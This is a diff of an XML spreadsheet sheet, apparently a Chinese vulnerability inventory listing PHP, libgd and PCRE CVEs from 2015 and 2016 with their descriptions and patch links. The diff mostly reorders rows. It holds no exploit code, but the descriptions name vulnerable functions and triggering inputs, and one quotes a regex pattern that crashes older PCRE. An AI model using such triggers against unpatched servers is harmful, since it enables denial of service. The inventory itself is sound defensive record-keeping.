@@ -45770,7 +45770,7 @@
       </c>
       <c r="F374" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。GD是其中的一个图形扩展库组件。xmlrpc-epi是一套采用C语言开发的易于开发者使用的序列化RPC请求的API。PHP中使用的xmlrpc-epi 0.54.2及之前的版本中的simplestring.c文件中的‘simplestring_addn’函数存在整数符号错误漏洞。远程攻击者可通过向PHP xmlrpc_encode_request函数传递较长的参数利用该漏洞造成拒绝服务（基于堆的缓冲区溢出）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的ext/snmp/snmp.c文件存在安全漏洞，该漏洞源于程序没有正确实现未序列化实施和垃圾数据回收的交互。远程攻击者可借助特制的序列化数据利用该漏洞造成拒绝服务（释放后重用和应用程序崩溃）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
         </is>
       </c>
       <c r="G374" t="inlineStr">
@@ -45790,7 +45790,7 @@
       </c>
       <c r="J374" t="inlineStr">
         <is>
-          <t>CVE-2016-6296</t>
+          <t>CVE-2016-6295</t>
         </is>
       </c>
       <c r="K374" t="inlineStr">
@@ -46465,7 +46465,7 @@
     <row r="380">
       <c r="A380" t="inlineStr">
         <is>
-          <t>PHP grapheme_strpos拒绝服务漏洞(CVE-2016-4541)</t>
+          <t>PHP Bcpowmod 函数拒绝服务漏洞(CVE-2016-4538)</t>
         </is>
       </c>
       <c r="B380" t="inlineStr">
@@ -46485,12 +46485,12 @@
       </c>
       <c r="E380" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
         </is>
       </c>
       <c r="F380" t="inlineStr">
         <is>
-          <t>PHP中ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_strpos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
+          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x中修改某些数据结构，而无需考虑它们是否是_zero_，_one_，或_two_全局变量，它允许远程攻击者通过精心设计的调用导致拒绝服务或可能造成未指定的其他影响。</t>
         </is>
       </c>
       <c r="G380" t="inlineStr">
@@ -46510,7 +46510,7 @@
       </c>
       <c r="J380" t="inlineStr">
         <is>
-          <t>CVE-2016-4541</t>
+          <t>CVE-2016-4538</t>
         </is>
       </c>
       <c r="K380" t="inlineStr">
@@ -46585,7 +46585,7 @@
     <row r="381">
       <c r="A381" t="inlineStr">
         <is>
-          <t>PHP Exif_process_ifd_in_jpeg拒绝服务漏洞(CVE-2016-4543)</t>
+          <t>PHP exif_process_ifd_tag拒绝服务漏洞(CVE-2016-4542)</t>
         </is>
       </c>
       <c r="B381" t="inlineStr">
@@ -46605,12 +46605,12 @@
       </c>
       <c r="E381" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=13ad4d3e971807f9a58ab5933182907dc2958539</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
         </is>
       </c>
       <c r="F381" t="inlineStr">
         <is>
-          <t>PHP的ext/exif/exif.c文件中的‘exif_process_IFD_in_JPEG’函数存在安全漏洞，该漏洞源于程序没有验证IFD大小。远程攻击者可借助特制的头部数据利用该漏洞造成拒绝服务（越边界读取）。</t>
+          <t>PHP的ext/exif/exif.c中的exif_process_IFD_TAG函数在5.5.35之前的版本，5.6.21之前的5.6.x和7.0.6之前的7.x不能正确构造spprintf参数，这使远程攻击者可以拒绝服务（越界读取）或可能通过精心制作的标头数据产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G381" t="inlineStr">
@@ -46630,7 +46630,7 @@
       </c>
       <c r="J381" t="inlineStr">
         <is>
-          <t>CVE-2016-4543</t>
+          <t>CVE-2016-4542</t>
         </is>
       </c>
       <c r="K381" t="inlineStr">
@@ -46705,7 +46705,7 @@
     <row r="382">
       <c r="A382" t="inlineStr">
         <is>
-          <t>PHP exif_process_ifd_tag拒绝服务漏洞(CVE-2016-4542)</t>
+          <t>PHP grapheme_strpos拒绝服务漏洞(CVE-2016-4541)</t>
         </is>
       </c>
       <c r="B382" t="inlineStr">
@@ -46730,7 +46730,7 @@
       </c>
       <c r="F382" t="inlineStr">
         <is>
-          <t>PHP的ext/exif/exif.c中的exif_process_IFD_TAG函数在5.5.35之前的版本，5.6.21之前的5.6.x和7.0.6之前的7.x不能正确构造spprintf参数，这使远程攻击者可以拒绝服务（越界读取）或可能通过精心制作的标头数据产生未指定的其他影响。</t>
+          <t>PHP中ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_strpos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G382" t="inlineStr">
@@ -46750,7 +46750,7 @@
       </c>
       <c r="J382" t="inlineStr">
         <is>
-          <t>CVE-2016-4542</t>
+          <t>CVE-2016-4541</t>
         </is>
       </c>
       <c r="K382" t="inlineStr">
@@ -46825,7 +46825,7 @@
     <row r="383">
       <c r="A383" t="inlineStr">
         <is>
-          <t>PHP Bcpowmod 函数拒绝服务漏洞(CVE-2016-4538)</t>
+          <t>PHP Exif_process_ifd_in_jpeg拒绝服务漏洞(CVE-2016-4543)</t>
         </is>
       </c>
       <c r="B383" t="inlineStr">
@@ -46845,12 +46845,12 @@
       </c>
       <c r="E383" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=13ad4d3e971807f9a58ab5933182907dc2958539</t>
         </is>
       </c>
       <c r="F383" t="inlineStr">
         <is>
-          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x中修改某些数据结构，而无需考虑它们是否是_zero_，_one_，或_two_全局变量，它允许远程攻击者通过精心设计的调用导致拒绝服务或可能造成未指定的其他影响。</t>
+          <t>PHP的ext/exif/exif.c文件中的‘exif_process_IFD_in_JPEG’函数存在安全漏洞，该漏洞源于程序没有验证IFD大小。远程攻击者可借助特制的头部数据利用该漏洞造成拒绝服务（越边界读取）。</t>
         </is>
       </c>
       <c r="G383" t="inlineStr">
@@ -46870,7 +46870,7 @@
       </c>
       <c r="J383" t="inlineStr">
         <is>
-          <t>CVE-2016-4538</t>
+          <t>CVE-2016-4543</t>
         </is>
       </c>
       <c r="K383" t="inlineStr">
@@ -48510,7 +48510,7 @@
     <row r="397">
       <c r="A397" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2016-4071)</t>
+          <t>PHP gd.c缓冲区溢出漏洞(CVE-2016-7126)</t>
         </is>
       </c>
       <c r="B397" t="inlineStr">
@@ -48525,18 +48525,17 @@
       </c>
       <c r="D397" t="inlineStr">
         <is>
-          <t>Other</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E397" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-https://git.php.net/?p=php-src.git;a=commit;h=6e25966544fb1d2f3d7596e060ce9c9269bbdcf8</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-7.php</t>
         </is>
       </c>
       <c r="F397" t="inlineStr">
         <is>
-          <t>PHP的ext/snmp/snmp.c文件中的‘php_snmp_error’函数存在格式化字符串漏洞。远程攻击者可借助SNMP：：get调用中的格式化字符串说明符利用该漏洞执行任意代码。以下版本受到影响：PHP 5.5.34之前版本，5.6.20之前5.6.x版本，7.0.5之前7.x版本。</t>
+          <t>PHP 5.6.25之前的ext/gd/gd.c中的imagetruecolortopalette函数以及7.0.10之前的7.x中的imagetruecolortopalette函数无法正确验证颜色数量，这使远程攻击者可能导致拒绝服务（select_colors分配错误并出边界写入），或者通过第三个参数中的较大值可能具有未指定的其他影响。</t>
         </is>
       </c>
       <c r="G397" t="inlineStr">
@@ -48556,7 +48555,7 @@
       </c>
       <c r="J397" t="inlineStr">
         <is>
-          <t>CVE-2016-4071</t>
+          <t>CVE-2016-7126</t>
         </is>
       </c>
       <c r="K397" t="inlineStr">
@@ -48631,7 +48630,7 @@
     <row r="398">
       <c r="A398" t="inlineStr">
         <is>
-          <t>PHP gd.c缓冲区溢出漏洞(CVE-2016-7126)</t>
+          <t>PHP 安全漏洞(CVE-2016-4071)</t>
         </is>
       </c>
       <c r="B398" t="inlineStr">
@@ -48646,17 +48645,18 @@
       </c>
       <c r="D398" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>Other</t>
         </is>
       </c>
       <c r="E398" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-7.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://git.php.net/?p=php-src.git;a=commit;h=6e25966544fb1d2f3d7596e060ce9c9269bbdcf8</t>
         </is>
       </c>
       <c r="F398" t="inlineStr">
         <is>
-          <t>PHP 5.6.25之前的ext/gd/gd.c中的imagetruecolortopalette函数以及7.0.10之前的7.x中的imagetruecolortopalette函数无法正确验证颜色数量，这使远程攻击者可能导致拒绝服务（select_colors分配错误并出边界写入），或者通过第三个参数中的较大值可能具有未指定的其他影响。</t>
+          <t>PHP的ext/snmp/snmp.c文件中的‘php_snmp_error’函数存在格式化字符串漏洞。远程攻击者可借助SNMP：：get调用中的格式化字符串说明符利用该漏洞执行任意代码。以下版本受到影响：PHP 5.5.34之前版本，5.6.20之前5.6.x版本，7.0.5之前7.x版本。</t>
         </is>
       </c>
       <c r="G398" t="inlineStr">
@@ -48676,7 +48676,7 @@
       </c>
       <c r="J398" t="inlineStr">
         <is>
-          <t>CVE-2016-7126</t>
+          <t>CVE-2016-4071</t>
         </is>
       </c>
       <c r="K398" t="inlineStr">
@@ -49596,7 +49596,7 @@
     <row r="406">
       <c r="A406" t="inlineStr">
         <is>
-          <t>PHP 缓冲区错误漏洞(CVE-2016-10166)</t>
+          <t>PHP 整数溢出漏洞(CVE-2016-3078)</t>
         </is>
       </c>
       <c r="B406" t="inlineStr">
@@ -49611,20 +49611,24 @@
       </c>
       <c r="D406" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>Integer Overflow</t>
         </is>
       </c>
       <c r="E406" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/libgd/libgd/commit/60bfb401ad5a4a8ae995dcd36372fe15c71e1a35</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://php.net/ChangeLg-7.php</t>
         </is>
       </c>
       <c r="F406" t="inlineStr">
         <is>
-          <t>GD Graphics Library（又名libgd或libgd2）是美国软件开发者Thomas Boutell所研发的一个开源的用于动态创建图像的库，它支持创建图表、图形和缩略图等。GD Graphics Library 2.2.4之前的版本中的gd_interpolation.c文件的‘_gdContributionsAlloc’函数存安全漏洞。远程攻击者可利用该漏洞造成拒绝服务。</t>
-        </is>
-      </c>
-      <c r="G406" t="inlineStr"/>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP 7.0.6之前版本中的zip扩展中的php_zip.c文件存在整数溢出漏洞。远程攻击者通过调用ZipArchive类中的‘getFromIndex’或‘getFromName’参数利用该漏洞造成拒绝服务（基于堆的缓冲区溢出和应用程序崩溃）。</t>
+        </is>
+      </c>
+      <c r="G406" t="inlineStr">
+        <is>
+          <t>Vuln with Attack Code Disclosure</t>
+        </is>
+      </c>
       <c r="H406" t="inlineStr">
         <is>
           <t>云镜</t>
@@ -49637,7 +49641,7 @@
       </c>
       <c r="J406" t="inlineStr">
         <is>
-          <t>CVE-2016-10166</t>
+          <t>CVE-2016-3078</t>
         </is>
       </c>
       <c r="K406" t="inlineStr">
@@ -49712,7 +49716,7 @@
     <row r="407">
       <c r="A407" t="inlineStr">
         <is>
-          <t>PHP 整数溢出漏洞(CVE-2016-3078)</t>
+          <t>PHP 缓冲区错误漏洞(CVE-2016-10166)</t>
         </is>
       </c>
       <c r="B407" t="inlineStr">
@@ -49727,24 +49731,20 @@
       </c>
       <c r="D407" t="inlineStr">
         <is>
-          <t>Integer Overflow</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E407" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://php.net/ChangeLg-7.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/libgd/libgd/commit/60bfb401ad5a4a8ae995dcd36372fe15c71e1a35</t>
         </is>
       </c>
       <c r="F407" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP 7.0.6之前版本中的zip扩展中的php_zip.c文件存在整数溢出漏洞。远程攻击者通过调用ZipArchive类中的‘getFromIndex’或‘getFromName’参数利用该漏洞造成拒绝服务（基于堆的缓冲区溢出和应用程序崩溃）。</t>
-        </is>
-      </c>
-      <c r="G407" t="inlineStr">
-        <is>
-          <t>Vuln with Attack Code Disclosure</t>
-        </is>
-      </c>
+          <t>GD Graphics Library（又名libgd或libgd2）是美国软件开发者Thomas Boutell所研发的一个开源的用于动态创建图像的库，它支持创建图表、图形和缩略图等。GD Graphics Library 2.2.4之前的版本中的gd_interpolation.c文件的‘_gdContributionsAlloc’函数存安全漏洞。远程攻击者可利用该漏洞造成拒绝服务。</t>
+        </is>
+      </c>
+      <c r="G407" t="inlineStr"/>
       <c r="H407" t="inlineStr">
         <is>
           <t>云镜</t>
@@ -49757,7 +49757,7 @@
       </c>
       <c r="J407" t="inlineStr">
         <is>
-          <t>CVE-2016-3078</t>
+          <t>CVE-2016-10166</t>
         </is>
       </c>
       <c r="K407" t="inlineStr">
@@ -49832,7 +49832,7 @@
     <row r="408">
       <c r="A408" t="inlineStr">
         <is>
-          <t>GD Graphics Library 整数符号错误漏洞(CVE-2016-3074)</t>
+          <t>PHP exif_process_tiff_in_jpeg拒绝服务漏洞(CVE-2016-4544)</t>
         </is>
       </c>
       <c r="B408" t="inlineStr">
@@ -49847,17 +49847,17 @@
       </c>
       <c r="D408" t="inlineStr">
         <is>
-          <t>Other</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E408" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://libgd.org/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
         </is>
       </c>
       <c r="F408" t="inlineStr">
         <is>
-          <t>GD图形库2.1.1中的整数签名错误（又名libgd或libgd2）允许远程攻击者导致拒绝服务（崩溃）或可能通过精心制作的压缩gd2数据执行任意代码，从而触发基于堆的缓冲区溢出。</t>
+          <t>PHP的ext/exif/exif.c文件中的‘exif_process_TIFF_in_JPEG’函数中存在安全漏洞，该漏洞源于程序没有验证TIFF起始数据。远程攻击者可借助特制的头部数据利用该漏洞造成拒绝服务（越边界读取）。</t>
         </is>
       </c>
       <c r="G408" t="inlineStr">
@@ -49877,7 +49877,7 @@
       </c>
       <c r="J408" t="inlineStr">
         <is>
-          <t>CVE-2016-3074</t>
+          <t>CVE-2016-4544</t>
         </is>
       </c>
       <c r="K408" t="inlineStr">
@@ -50072,7 +50072,7 @@
     <row r="410">
       <c r="A410" t="inlineStr">
         <is>
-          <t>PHP exif_process_tiff_in_jpeg拒绝服务漏洞(CVE-2016-4544)</t>
+          <t>GD Graphics Library 整数符号错误漏洞(CVE-2016-3074)</t>
         </is>
       </c>
       <c r="B410" t="inlineStr">
@@ -50087,17 +50087,17 @@
       </c>
       <c r="D410" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>Other</t>
         </is>
       </c>
       <c r="E410" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://libgd.org/</t>
         </is>
       </c>
       <c r="F410" t="inlineStr">
         <is>
-          <t>PHP的ext/exif/exif.c文件中的‘exif_process_TIFF_in_JPEG’函数中存在安全漏洞，该漏洞源于程序没有验证TIFF起始数据。远程攻击者可借助特制的头部数据利用该漏洞造成拒绝服务（越边界读取）。</t>
+          <t>GD图形库2.1.1中的整数签名错误（又名libgd或libgd2）允许远程攻击者导致拒绝服务（崩溃）或可能通过精心制作的压缩gd2数据执行任意代码，从而触发基于堆的缓冲区溢出。</t>
         </is>
       </c>
       <c r="G410" t="inlineStr">
@@ -50117,7 +50117,7 @@
       </c>
       <c r="J410" t="inlineStr">
         <is>
-          <t>CVE-2016-4544</t>
+          <t>CVE-2016-3074</t>
         </is>
       </c>
       <c r="K410" t="inlineStr">
@@ -52481,7 +52481,7 @@
     <row r="430">
       <c r="A430" t="inlineStr">
         <is>
-          <t>PHP incomplete_class.c 内存破坏漏洞(CVE-2015-4602)</t>
+          <t>PHP内存破坏漏洞(CVE-2015-4599)</t>
         </is>
       </c>
       <c r="B430" t="inlineStr">
@@ -52496,17 +52496,18 @@
       </c>
       <c r="D430" t="inlineStr">
         <is>
-          <t>Memory Corruption Exploit</t>
+          <t>memory corruption</t>
         </is>
       </c>
       <c r="E430" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://bugs.php.net/bug.php?id=69152</t>
         </is>
       </c>
       <c r="F430" t="inlineStr">
         <is>
-          <t>PHP的ext/standard/incomplete_class.c中的__PHP_Incomplete_Class函数在5.4.40之前，5.5.24之前的5.5.x和5.6.8之前的5.6.x中允许远程攻击者拒绝服务（应用程序崩溃）或可能执行通过意外的数据类型生成的任意代码，与“类型混淆”问题有关。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/soap/soap.c文件中的‘SoapFault：：__toString’方法存在安全漏洞。远程攻击者可借助数据类型利用该漏洞获取敏感信息，造成拒绝服务（应用程序崩溃），或执行任意代码。以下版本受到影响：PHP 5.4.40之前版本，5.5.24之前5.5.x版本，5.6.8之前5.6.x版本。</t>
         </is>
       </c>
       <c r="G430" t="inlineStr">
@@ -52526,7 +52527,7 @@
       </c>
       <c r="J430" t="inlineStr">
         <is>
-          <t>CVE-2015-4602</t>
+          <t>CVE-2015-4599</t>
         </is>
       </c>
       <c r="K430" t="inlineStr">
@@ -52601,7 +52602,7 @@
     <row r="431">
       <c r="A431" t="inlineStr">
         <is>
-          <t>PHP内存破坏漏洞(CVE-2015-4599)</t>
+          <t>PHP incomplete_class.c 内存破坏漏洞(CVE-2015-4602)</t>
         </is>
       </c>
       <c r="B431" t="inlineStr">
@@ -52616,18 +52617,17 @@
       </c>
       <c r="D431" t="inlineStr">
         <is>
-          <t>memory corruption</t>
+          <t>Memory Corruption Exploit</t>
         </is>
       </c>
       <c r="E431" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-https://bugs.php.net/bug.php?id=69152</t>
+          <t>目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net/</t>
         </is>
       </c>
       <c r="F431" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/soap/soap.c文件中的‘SoapFault：：__toString’方法存在安全漏洞。远程攻击者可借助数据类型利用该漏洞获取敏感信息，造成拒绝服务（应用程序崩溃），或执行任意代码。以下版本受到影响：PHP 5.4.40之前版本，5.5.24之前5.5.x版本，5.6.8之前5.6.x版本。</t>
+          <t>PHP的ext/standard/incomplete_class.c中的__PHP_Incomplete_Class函数在5.4.40之前，5.5.24之前的5.5.x和5.6.8之前的5.6.x中允许远程攻击者拒绝服务（应用程序崩溃）或可能执行通过意外的数据类型生成的任意代码，与“类型混淆”问题有关。</t>
         </is>
       </c>
       <c r="G431" t="inlineStr">
@@ -52647,7 +52647,7 @@
       </c>
       <c r="J431" t="inlineStr">
         <is>
-          <t>CVE-2015-4599</t>
+          <t>CVE-2015-4602</t>
         </is>
       </c>
       <c r="K431" t="inlineStr">
@@ -53080,7 +53080,7 @@
     <row r="435">
       <c r="A435" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8390)</t>
+          <t>PHP 安全漏洞(CVE-2015-8389)</t>
         </is>
       </c>
       <c r="B435" t="inlineStr">
@@ -53106,7 +53106,7 @@
       </c>
       <c r="F435" t="inlineStr">
         <is>
-          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理字符类中的‘[：’和‘＼＼’子串。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（未初始化内存读取）。PHP 引用这个底层库。</t>
+          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理‘/(?：|a|){100}x/’模式和相关模式。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（无限递归）。PHP 引用这个底层组件。</t>
         </is>
       </c>
       <c r="G435" t="inlineStr"/>
@@ -53122,7 +53122,7 @@
       </c>
       <c r="J435" t="inlineStr">
         <is>
-          <t>CVE-2015-8390</t>
+          <t>CVE-2015-8389</t>
         </is>
       </c>
       <c r="K435" t="inlineStr">
@@ -53197,7 +53197,7 @@
     <row r="436">
       <c r="A436" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2015-8389)</t>
+          <t>PHP 安全漏洞(CVE-2015-8390)</t>
         </is>
       </c>
       <c r="B436" t="inlineStr">
@@ -53223,7 +53223,7 @@
       </c>
       <c r="F436" t="inlineStr">
         <is>
-          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理‘/(?：|a|){100}x/’模式和相关模式。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（无限递归）。PHP 引用这个底层组件。</t>
+          <t>PCRE（Perl Compatible Regular Expressions）是软件开发者Philip Hazel所研发的一个使用C语言编写的开源正则表达式函数库。PCRE 8.38之前版本中存在安全漏洞，该漏洞源于程序没有正确处理字符类中的‘[：’和‘＼＼’子串。远程攻击者可借助特制的正则表达式利用该漏洞造成拒绝服务（未初始化内存读取）。PHP 引用这个底层库。</t>
         </is>
       </c>
       <c r="G436" t="inlineStr"/>
@@ -53239,7 +53239,7 @@
       </c>
       <c r="J436" t="inlineStr">
         <is>
-          <t>CVE-2015-8389</t>
+          <t>CVE-2015-8390</t>
         </is>
       </c>
       <c r="K436" t="inlineStr">
@@ -54994,7 +54994,7 @@
     <row r="451">
       <c r="A451" t="inlineStr">
         <is>
-          <t>PHP Exif_process_ifd_in_jpeg拒绝服务漏洞(CVE-2016-4543)</t>
+          <t>PHP exif_process_ifd_tag拒绝服务漏洞(CVE-2016-4542)</t>
         </is>
       </c>
       <c r="B451" t="inlineStr">
@@ -55014,12 +55014,12 @@
       </c>
       <c r="E451" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=13ad4d3e971807f9a58ab5933182907dc2958539</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
         </is>
       </c>
       <c r="F451" t="inlineStr">
         <is>
-          <t>PHP的ext/exif/exif.c文件中的‘exif_process_IFD_in_JPEG’函数存在安全漏洞，该漏洞源于程序没有验证IFD大小。远程攻击者可借助特制的头部数据利用该漏洞造成拒绝服务（越边界读取）。</t>
+          <t>PHP的ext/exif/exif.c中的exif_process_IFD_TAG函数在5.5.35之前的版本，5.6.21之前的5.6.x和7.0.6之前的7.x不能正确构造spprintf参数，这使远程攻击者可以拒绝服务（越界读取）或可能通过精心制作的标头数据产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G451" t="inlineStr">
@@ -55039,7 +55039,7 @@
       </c>
       <c r="J451" t="inlineStr">
         <is>
-          <t>CVE-2016-4543</t>
+          <t>CVE-2016-4542</t>
         </is>
       </c>
       <c r="K451" t="inlineStr">
@@ -55114,7 +55114,7 @@
     <row r="452">
       <c r="A452" t="inlineStr">
         <is>
-          <t>PHP exif_process_ifd_tag拒绝服务漏洞(CVE-2016-4542)</t>
+          <t>PHP Exif_process_ifd_in_jpeg拒绝服务漏洞(CVE-2016-4543)</t>
         </is>
       </c>
       <c r="B452" t="inlineStr">
@@ -55134,12 +55134,12 @@
       </c>
       <c r="E452" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=13ad4d3e971807f9a58ab5933182907dc2958539</t>
         </is>
       </c>
       <c r="F452" t="inlineStr">
         <is>
-          <t>PHP的ext/exif/exif.c中的exif_process_IFD_TAG函数在5.5.35之前的版本，5.6.21之前的5.6.x和7.0.6之前的7.x不能正确构造spprintf参数，这使远程攻击者可以拒绝服务（越界读取）或可能通过精心制作的标头数据产生未指定的其他影响。</t>
+          <t>PHP的ext/exif/exif.c文件中的‘exif_process_IFD_in_JPEG’函数存在安全漏洞，该漏洞源于程序没有验证IFD大小。远程攻击者可借助特制的头部数据利用该漏洞造成拒绝服务（越边界读取）。</t>
         </is>
       </c>
       <c r="G452" t="inlineStr">
@@ -55159,7 +55159,7 @@
       </c>
       <c r="J452" t="inlineStr">
         <is>
-          <t>CVE-2016-4542</t>
+          <t>CVE-2016-4543</t>
         </is>
       </c>
       <c r="K452" t="inlineStr">
@@ -55595,7 +55595,7 @@
     <row r="456">
       <c r="A456" t="inlineStr">
         <is>
-          <t>PHP 远程代码执行漏洞(CVE-2015-6834)</t>
+          <t>PHP gdimagerotateinterpolated拒绝服务漏洞(CVE-2016-1903)</t>
         </is>
       </c>
       <c r="B456" t="inlineStr">
@@ -55610,7 +55610,7 @@
       </c>
       <c r="D456" t="inlineStr">
         <is>
-          <t>Code Execution</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E456" t="inlineStr">
@@ -55620,7 +55620,7 @@
       </c>
       <c r="F456" t="inlineStr">
         <is>
-          <t>PHP中的5.4.45之前，5.5.29之前的5.5.x和5.6.13之前的5.6.x中的多个Free-After-Use漏洞允许远程攻击者通过与（1）Serializable接口相关的向量执行任意代码，（2 ）SplObjectStorage类，以及（3）SplDoublyLinkedList类，它们在反序列化期间会被错误处理。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/gd/libgd/gd_interpolation.c文件中的‘gdImageRotateInterpolated’函数存在安全漏洞，该漏洞源于‘imagerotate’函数没有充分过滤较大的‘bgd_color’参数。远程攻击者可利用该漏洞获取敏感信息，或造成拒绝服务（越边界读取和应用程序崩溃）。以下版本受到影响：PHP 5.5.31之前版本，5.6.17之前5.6.x版本，7.0.2之前7.x版本。</t>
         </is>
       </c>
       <c r="G456" t="inlineStr">
@@ -55640,7 +55640,7 @@
       </c>
       <c r="J456" t="inlineStr">
         <is>
-          <t>CVE-2015-6834</t>
+          <t>CVE-2016-1903</t>
         </is>
       </c>
       <c r="K456" t="inlineStr">
@@ -55715,7 +55715,7 @@
     <row r="457">
       <c r="A457" t="inlineStr">
         <is>
